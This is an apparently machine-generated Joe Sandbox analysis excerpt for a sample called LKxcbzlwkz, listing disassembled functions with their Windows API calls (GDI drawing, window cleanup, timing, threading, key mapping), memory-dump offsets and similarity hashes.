                                                                                                                                                                                                                                                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3275902921-0
                                                                                                                                                                                                                                                            • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                                                                                                                                                                            • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                                                                                                                                                                                                            Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3275902921-0
                                                                                                                                                                                                                                                            • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                                                                                                                                                                            • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                                                                                                                                                                                                            Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                                                                                                                                                                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2833360925-0
                                                                                                                                                                                                                                                            • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                                                                                                                                                                            • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                                                                                                                                                                                                            Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SendMessageW.USER32 ref: 004555C7
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3691411573-0
                                                                                                                                                                                                                                                            • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                                                                                                                                                                                            • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                                                                                                                                                                                                                            Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                                                                                                                                              • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                                                                                                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                                                                                                                                              • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                                                                                                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                                                                                                                                                                                                            • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                                                                                                                                                                                                            • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                                                                                                                                                                                                            • EndPath.GDI32(?), ref: 004472D6
                                                                                                                                                                                                                                                            • StrokePath.GDI32(?), ref: 004472E4
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 372113273-0
                                                                                                                                                                                                                                                            • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                                                                                                                                                                            • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                                                                                                                                                                                                            Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 0044CC6D
                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1035833867-0
                                                                                                                                                                                                                                                            • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                                                                                                                                                                            • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                                                                                                                                                                                                            Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • __getptd.LIBCMT ref: 0041708E
                                                                                                                                                                                                                                                              • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                                                                                                                                                                              • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                                                                                                                                                                            • __amsg_exit.LIBCMT ref: 004170AE
                                                                                                                                                                                                                                                            • __lock.LIBCMT ref: 004170BE
                                                                                                                                                                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 004170EE
                                                                                                                                                                                                                                                            • InterlockedIncrement.KERNEL32(017D2CE0), ref: 00417106
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3470314060-0
                                                                                                                                                                                                                                                            • Opcode ID: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                                                                                                                                                                                                                                            • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                                                                                                                                                                                                            Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                                                                                                                                                                                                              • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3495660284-0
                                                                                                                                                                                                                                                            • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                                                                                                                                                                            • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                                                                                                                                                                                                            Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Virtual
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4278518827-0
                                                                                                                                                                                                                                                            • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                                                                                                                                                                            • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                                                                                                                                                                                                            Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                                                                                                                                                                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                                                                                                                                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                                                                                                                                            • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                                                                                                                                                                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                                                                                                                                            • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 004151ED
                                                                                                                                                                                                                                                            • __freefls@4.LIBCMT ref: 00415209
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 442100245-0
                                                                                                                                                                                                                                                            • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                                                                                                                                                                            • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                                                                                                                                                                                                            Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                                                                                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0045F94A
                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                            • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
